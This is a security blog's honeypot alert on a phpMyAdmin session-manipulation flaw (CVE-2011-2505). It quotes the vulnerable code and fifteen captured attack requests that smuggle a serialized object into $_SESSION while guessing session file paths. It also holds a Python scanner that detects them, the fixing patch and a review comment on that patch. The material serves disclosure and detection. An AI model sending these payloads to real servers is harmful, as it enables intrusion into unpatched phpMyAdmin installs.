SpiderLabs Blog

[Honeypot Alert] phpMyAdmin Superglobal Session Manipulation Attack Detected

Written by Ryan Barnett | Jan 17, 2012 4:56:00 PM

Our web honeypots have identified attempts to exploit CVE-2011-2505. OSVDB lists the vulnerability as: phpMyAdmin libraries/auth/swekey/swekey.auth.lib.php Swekey_login() Function Superglobal Session Manipulation Arbitrary PHP Code Execution.


Vulnerability Details

The vulnerability lies within the following code snippet of the libraries/auth/swekey/swekey.auth.lib.php file:

266  if (strstr($_SERVER['QUERY_STRING'], 'session_to_unset') != false)
267  {
268      parse_str($_SERVER['QUERY_STRING']);
269      session_write_close();
270      session_id($session_to_unset);
271      session_start();
272      $_SESSION = array();
273      session_write_close();
274      session_destroy();
275      exit;
276  }

Line 268 calls parse_str() with only its first argument. parse_str() takes an optional second argument, an array that receives the parsed parameters; when it is omitted, every name in the query string is registered as a variable in the current scope, register_globals style. Nothing restricts which names the attacker may use, so a parameter such as _SESSION[...] lands in the $_SESSION array itself. The result is that the attacker takes full control of the $_SESSION array, which session_write_close() on line 269 then saves to the session store.

Attack Attempts

Here are the attacks captured by the honeypots:

77.38.12.98 - - [17/Jan/2012:01:55:14 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A10%3A%22%2Ftmp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:15 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A14%3A%22%2Fvar%2Ftmp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:16 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A18%3A%22%2Fvar%2Flib%2Fphp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:16 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A19%3A%22%2Fvar%2Flib%2Fphp4%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:17 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A19%3A%22%2Fvar%2Flib%2Fphp5%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:18 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A26%3A%22%2Fvar%2Flib%2Fphp%2Fsession%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:19 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22%2Fvar%2Flib%2Fphp4%2Fsession%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:20 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22%2Fvar%2Flib%2Fphp5%2Fsession%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:21 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A21%3A%22%2Fshared%2Fsessionssess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:22 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A23%3A%22%2Fvar%2Fphp_sessions%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:23 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A19%3A%22%2Fvar%2Fsessions%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:24 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A23%3A%22%2Ftmp%2Fphp_sessions%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:25 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A19%3A%22%2Ftmp%2Fsessions%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:26 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A18%3A%22..%2F..%2F..%2Ftmp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
77.38.12.98 - - [17/Jan/2012:01:55:27 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A21%3A%22..%2F..%2F..%2F..%2Ftmp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"

As you can see, the attacker is attempting to inject serialized data into the $_SESSION array through the _SESSION[!bla] query parameter. URL-decoded, the value in the first request is |xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:10:"/tmp/sess_";}}, a serialized PMA_Config object whose source property holds a session file path. The successive requests only change that path, cycling through common PHP session save locations (/tmp, /var/tmp, /var/lib/php5/session and so on) and a few directory-traversal variants, so the attacker is guessing where this server stores its session files. These attacks were identified by the following:
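The Python below is an added example, not code from the SpiderLabs post, the honeypot's own signature, or phpMyAdmin. It covers both points above: php_parse_str() emulates what the one-argument parse_str() call on line 268 does to a query string (bracketed names become nested arrays, so _SESSION[!bla]=... produces a variable named _SESSION), and analyze_request() runs that over two lines copied from the capture plus one constructed benign request, flags requests that combine session_to_unset with a superglobal name, and decodes the class name and source path out of the serialized payload. The Apache combined-log regex and the single-property serialized-object regex are simplifying assumptions sized to this capture, not a general unserialize() grammar; the 192.0.2.10 line and the SUPERGLOBALS list are mine.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format, as used by the honeypot capture above (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# PHP superglobals that a one-argument parse_str() lets the query string overwrite.
SUPERGLOBALS = {"_SESSION", "_GET", "_POST", "_COOKIE", "_SERVER", "_ENV",
                "_REQUEST", "_FILES", "GLOBALS"}

# Serialized PHP object carrying one string property, e.g.
#   O:10:"PMA_Config":1:{s:6:"source";s:10:"/tmp/sess_";}
# Assumption: enough for this payload, not the full PHP serialization grammar.
SERIALIZED_OBJ_RE = re.compile(
    r'O:\d+:"(?P<cls>[^"]+)":\d+:\{s:\d+:"(?P<prop>[^"]+)";s:\d+:"(?P<val>[^"]*)";'
)

# Two lines copied from the capture above, plus one constructed benign request.
SAMPLE_LOG_LINES = [
    '77.38.12.98 - - [17/Jan/2012:01:55:14 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A10%3A%22%2Ftmp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"',
    '77.38.12.98 - - [17/Jan/2012:01:55:20 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22%2Fvar%2Flib%2Fphp5%2Fsession%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"',
    # Constructed: an ordinary phpMyAdmin request with no session manipulation.
    '192.0.2.10 - - [17/Jan/2012:02:10:00 -0600] "GET /mysql/index.php?token=abc HTTP/1.1" 200 6720 "-" "Mozilla/5.0"',
]


def php_parse_str(query):
    """Emulate PHP's one-argument parse_str(): every parameter becomes a variable.

    Bracket syntax builds nested arrays, so _SESSION[!bla]=x yields
    {'_SESSION': {'!bla': 'x'}}, i.e. a variable named _SESSION.
    (PHP's dot/space-to-underscore rewriting of names is not emulated.)
    """
    result = {}
    for pair in query.split("&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition("=")
        name, value = unquote_plus(raw_name), unquote_plus(raw_value)
        m = re.match(r"^([^\[]*)((?:\[[^\]]*\])*)", name)
        base, keys = m.group(1), re.findall(r"\[([^\]]*)\]", m.group(2))
        if not keys:
            result[base] = value
            continue
        node = result.get(base)
        if not isinstance(node, dict):
            node = result[base] = {}
        for key in keys[:-1]:
            key = key or str(len(node))      # a[] appends at the next index
            child = node.get(key)
            if not isinstance(child, dict):
                child = node[key] = {}
            node = child
        node[keys[-1] or str(len(node))] = value
    return result


def analyze_request(line):
    """Parse one log line, report query parameters that would land in PHP
    superglobals through the vulnerable parse_str() call, and decode any
    serialized object smuggled into _SESSION. Returns None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    params = php_parse_str(query)
    session = params.get("_SESSION")
    objects = []
    if isinstance(session, dict):
        for key, val in session.items():
            if not isinstance(val, str):
                continue
            for obj in SERIALIZED_OBJ_RE.finditer(val):
                objects.append({"session_key": key, "class": obj.group("cls"),
                                obj.group("prop"): obj.group("val")})
    clobbered = sorted(k for k in params if k in SUPERGLOBALS)
    return {
        "ip": m.group("ip"),
        "path": path,
        "session_to_unset": params.get("session_to_unset"),
        "clobbered_superglobals": clobbered,
        "serialized_objects": objects,
        # The CVE-2011-2505 shape: session_to_unset present plus a superglobal set.
        "suspicious": bool(clobbered) and "session_to_unset" in params,
    }


def scan(lines):
    """Return the findings for every suspicious request in an iterable of log lines."""
    findings = (analyze_request(line) for line in lines)
    return [f for f in findings if f and f["suspicious"]]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG_LINES):
        print(finding)
```

Run against the capture, scan() returns one finding per attack request with the guessed session path in serialized_objects, which is the quickest way to see that the attacker is enumerating session.save_path candidates rather than sending fifteen unrelated payloads.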

Code Patches

The phpMyAdmin libraries/auth/swekey/swekey.auth.lib.php file has since been fixed by removing the parse_str() call and reading session_to_unset from $_GET instead of parsing $_SERVER['QUERY_STRING']:

--- a/libraries/auth/swekey/swekey.auth.lib.php +++ b/libraries/auth/swekey/swekey.auth.lib.php @@ -263,11 +263,10 @@ function Swekey_login($input_name, $input_go) } } -if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false) +if (!empty($_GET['session_to_unset'])) { - parse_str($_SERVER['QUERY_STRING']); session_write_close(); - session_id($session_to_unset); + session_id($_GET['session_to_unset']); session_start(); $_SESSION = array(); session_write_close();
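Review bot: the replacement line `session_id($_GET['session_to_unset']);` still hands an unvalidated, attacker-chosen string to session_id() immediately before session_start(); the `!empty($_GET['session_to_unset'])` guard only checks that something was supplied, not what. Restrict the value to the character set PHP uses for session identifiers before calling session_id(), for example reject anything that does not match `/^[A-Za-z0-9,-]+$/`, so that a crafted identifier cannot reach the session save handler.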